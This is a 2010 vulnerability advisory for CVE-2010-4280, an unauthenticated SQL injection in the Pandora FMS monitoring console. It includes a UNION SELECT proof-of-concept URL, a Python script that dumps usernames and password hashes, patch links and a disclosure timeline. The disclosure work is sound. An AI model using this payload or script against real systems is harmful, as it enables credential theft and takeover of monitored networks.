Pandora FMS <= 3.1 SQL Injection

2010.12.05
Credit: Juan Galiana Lara
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-4280
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[+] Introduction Pandora FMS (for Pandora Flexible Monitoring System) is a software solution for monitoring computer networks. It allows monitoring in a visual way the status and performance of several parameters from different operating systems, servers, applications and hardware systems such as firewalls, proxies, databases, web servers or routers. It can be deployed in almost any operating system. It features remote monitoring (WMI, SNMP, TCP. UDP, ICMP, HTTP...) and it can also use agents. An agent is available for each platform. It can also monitor hardware systems with a TCP/IP stack, such as load balancers, routers, network switches, printers or firewalls. This software has several servers that process and get information from different sources, using WMI for gathering remote Windows information, a predictive server, a plug-in server which makes complex user-defined network tests, an advanced export server to replicate data between different sites of Pandora FMS, a network discovery server, and an SNMP Trap console. Released under the terms of the GNU General Public License, Pandora FMS is free software. 3) SQL Injection - CVE-2010-4280 - CVSS 8.5/10 The parameter id_group when get_agents_group_json is equal to 1 is vulnerable to SQL Injection attacks. PoC: http://host/pandora_console/ajax.php?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario Exploit: # Pandora Flexible Monitoring System SQL Injection PoC # Juan Galiana Lara # Gets the list of users and password from the database # #configure cookie&host before use it #usage #python sqlinj_users.py #admin:75b756ff2785ea8bb9ae02c13b6a71f1 #... import json import urllib2 headers = {"Cookie": "PHPSESSID=a4s3nf1tqv2fau8s6qhi6rutp9dahe9o"} url = "http://HOST/pandora_console/ajax.php"; url+= "?page=operation/agentes/ver_agente&get_agents_group_json=1&id_group=1" url+= "/**/and/**/1=0/**/union/**/select/**/id_user,password/**/from/**/tusuario" req = urllib2.Request(url,headers=headers) resp = urllib2.urlopen(req) users = json.read(resp.read()) for user in users: print(user["id_agente"]+":"+user["nombre"]) The fix to these kind of issues was the implementation of a generic filter against sql injection. A proper fix is planned for a major version. [+] Impact An attacker can execute commands of the operating system, inject remote code in the context of the application, get arbitrary files from the filesystem or extract any data of the database including passwords and confidential information about the monitored network/systems. Also it is possible to bypass the authentication or scale privileges to became admin, gaining full control of the web application and web server. These vulnerabilities have a high impact to the confidentiality, integrity, and availability of the system. [+] Systems affected Versions prior and including 3.1 of Pandora FMS are affected [+] Solution Apply the security fix for version 3.1: http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download Or upgrade to version 3.1.1 from http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/3.1.1/ [+] Timeline Ago 2010: First contact to vendor Ago 2010: Confirmation of vendor Sept 2010: Second contact: SQL Injection vulnerabilities Sept 2010: Confirmation that the fix will be released on October Oct 2010: PandoraFMS security patch for 3.1 version released Oct 2010: Request for CVE numbers Nov 2010: PandoraFMS version 3.1.1 released Nov 2010: Disclosure of this advisory [+] References Official PandoraFMS site: http://pandorafms.org/ SourceForge PandoraFMS site: http://sourceforge.net/projects/pandora/ Wikipedia entry about PandoraFMS: http://en.wikipedia.org/wiki/Pandora_FMS Common Vulnerability Scoring System (CVSS) v2 calculator: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2 Common Vulnerabilities and Exposures (CVE): http://cve.mitre.org/ [+] Credits These vulnerabilities has been discovered by Juan Galiana Lara - @jgaliana - http://juangaliana.blogspot.com/

References:

http://sourceforge.net/projects/pandora/files/Pandora%20FMS%203.1/Final%20version%20%28Stable%29/pandorafms_console-3.1_security_patch_13Oct2010.tar.gz/download
http://www.securityfocus.com/bid/45112
http://www.securityfocus.com/archive/1/archive/1/514939/100/0/threaded
http://www.exploit-db.com/exploits/15642
http://www.exploit-db.com/exploits/15641


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top